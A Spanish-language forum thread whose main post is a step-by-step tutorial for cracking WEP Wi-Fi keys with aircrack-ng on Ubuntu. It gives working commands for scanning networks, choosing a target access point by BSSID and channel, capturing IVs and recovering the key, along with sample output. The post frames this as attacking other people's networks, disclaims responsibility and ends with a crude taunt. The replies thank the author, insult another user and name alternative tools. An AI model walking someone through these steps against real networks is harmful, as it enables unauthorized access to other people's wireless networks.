Tutorial sobre como crackear claves WEP usando Aircrack.
Realizado bajo la distribucion de Ubuntu (Lucid Lynx 10.04)
Totalmente funcional..

Imagen


Lo primero y principal de este manual es instalar la suite de Aircrack-ng, si ya la tenemos obviemos este paso..
Para instalar dicha suite no basta mas que teclear en nuestra terminal:

Código: Seleccionar todo

sudo apt-get install aircrack-ng
Para comprobar si nuestra tarjeta de red es disponible confirmamos [Enlace externo eliminado para invitados]

Una ves descargado, en consola tipearemos:

Código: Seleccionar todo

aircrack-ng
Nos toparemos con algo como esto:
[Enlace externo eliminado para invitados]

Necesitaremos saber el nombre de nuestra interfaz de RED, si ya lo sabemos obviamos este paso, para saber nuestro nombre de interfaz en consola tecleamos:

Código: Seleccionar todo

sudo airmon-ng
Echo esto podemos usar Aircrack para escanear redes (recuerden sustituir wlan0 por el nombre de nuestra interfaz de red) para escanear las redes tecleamos en un terminal:

Código: Seleccionar todo

sudo airodump-ng wlan0
Nos toparemos con algo como esto:

Código: Seleccionar todo

CH  9 ][ Elapsed: 4 s ][ 2007-02-25 16:47
                                                                                                           
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                           
00:09:5B:1C:AA:1D   11  16       10        0    0  11  54. OPN              EJEMPLO                         
00:14:6C:7A:41:81   34 100       57       14    1   9  11  WEP  WEP       EJEMPLO
Apartir de esta lista debemos fijarnos en:
1. El tipo de clave que utiliza [ENC]
2. La MAC del punto de acceso al que queremos atacar [BSSID]
3. El canal de la red que queremos atacar [CH]
4. Comprobar que esta capturando IV's, sin esto no podremos hacer nada... [#Data]

Ahora de todas las redes que detectemos, una buena opción es elegir la red de la cual consigamos capturar mas IV's [#Data]

Elegida la RED que deseas crackear, empezamos a capturar paquetes de esta con el comando:

Código: Seleccionar todo

sudo airodump-ng wlan0 --bssid 00:00:00:00:00:00 --channel 5 --w out
^- Recuerden lo de sustituir wlan0 por su nombre de RED -^


Donde en el comando anterior
--bssid Es el numero de MAC del punto de acceso al que queremos atacar.
--channel Es el canal en el que emite la red a la que queremos atacar.
--w out Es el nombre del archivo en el que se guardaran las paquetes capturados.

Nos toparemos con unos datos parecidos a estos:

Código: Seleccionar todo

CH  9 ][ Elapsed: 12 min ][ 2007-02-25 17:24
                                                                                                           
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                                         
00:14:6C:7A:41:81   34 100     59424     33258    1   9  11  WEP  WEP         EJEMPLO
Donde vemos que con esa red escaneada recopilamos (33258 IV's o Data#)

Luego de el escaneo y todo, si conseguimos encontrar una cantidad buena de IV's intentamos crackear la clave con el siguiente comando:

Código: Seleccionar todo

sudo aircrack-ng *.cap
Si por algún motivo nos dice que no contamos con suficientes IV's, bastaría con repetir el paso anterior y esperar a que consiga mas IV's para su mejor crackeo.

Si todo va bien, pues en cuestion de 10 a 15 minutos tendremos nuestra clave WEP

Según la web oficial de Aircrack-ng es necesario tener 600.000 IV's para claves WEP de 40 bits, y 1.500.000 IV's para claves de 104 bits, aunque por experiencia propia, recomiendo ir probando cuando dispongamos de una cantidad considerable de IV's.

Espero disfruten y aprendan con este tutorial x'D
No me hago responsable de lo que hagan con esto, bla, bla, bla..
Feliz hacking de Waifai

Un saludo - Kode :3
Welcome to your nightmare, bitch.
gracias a favoritos le echaremos el vistazo yo estaba tratando en Ubuntu y no podía por el sudo no me dejaba autentificarme no se el problema voy a ver con alma este tutorial y te comento muchas gracias
baneado Franbv ? que importa fran es mas que un nick ............. fran es del pueblo no se vende ni corrompe solo es un pelotudo con muchas cuentas y mucho tiempo libre ;)
Gracias por el tuto, funciona perfectamente, aunque con wifiway o wepbuster, incluso con una data en muchas ocasiones, hablo de WEP, es suficiente para auditar la red, de redes Wlan_XX, Wlan_XXXXXX, aunque para redes con distinto nombre hay que esperar a 15.000 datas. Saludos
Responder

Volver a “Linux”